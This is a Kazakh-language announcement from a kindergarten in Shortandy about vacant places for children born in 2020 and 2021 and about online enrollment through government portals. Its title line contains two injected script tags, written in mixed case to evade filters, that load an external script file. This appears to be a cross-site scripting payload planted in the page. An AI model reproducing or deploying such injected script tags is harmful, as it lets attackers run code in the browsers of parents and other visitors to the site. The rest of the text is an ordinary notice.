Балабақшаға қабылдау туралы хабарландыру!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
24.07.2024
Құрметті ата-аналар! Шортанды кентінде орналасқан "Балдәурен" балабақшасы ағымдағы жылдың 01- тамызынан бастап балаларды бос орындарға қабылдауға және жолдама алуға шақырады.
Қазақ тілінде оқытатын топтарға:
- 2021 жылы туған балалар үшін-20 бос орын;
- 2020 жылы туған балалар үшін - 8 бос орын;
Орыс тілінде оқытатын топтар бойынша:
- 2021 жылы туған балалар үшін - 23 орын;
- 2020 жылы туғандар үшін - 1 орын.
Біз тәрбиеленушілерімізге жайлы жағдайларын, кәсіби қарау және күтім, сондай-ақ білім беру қызметтерін ұсынамыз.
Біздің балабақшада педагогикалық, медициналық және қызмет көрсететін қызметкерлер жақсы қалыптасқан.
Сіз жұмыста болған кезде балаңызды бізге сеніп тапсыра аласыз!
Балаларды мектепке дейінгі ұйымға қабылдаудың ашықтығын қамтамасыз ету мақсатында әрбір ата-ана өз бетімен баланы кезекке қоя алады, кезек нөмірін көре алады, балабақшадағы бос орындарды бақылай алады, сондай-ақ баланы мектепке дейінгі ұйымға қабылдауға жолдама ала алады.
Ол үшін ЭЦП (электрондық цифрлық қолтаңба) арқылы https://akmola.kz/ https://egov.kz/ сайтына өту қажет немесе балабақшаға келіп өзіңіздің ЭЦП арқылы жолдама ала аласыз.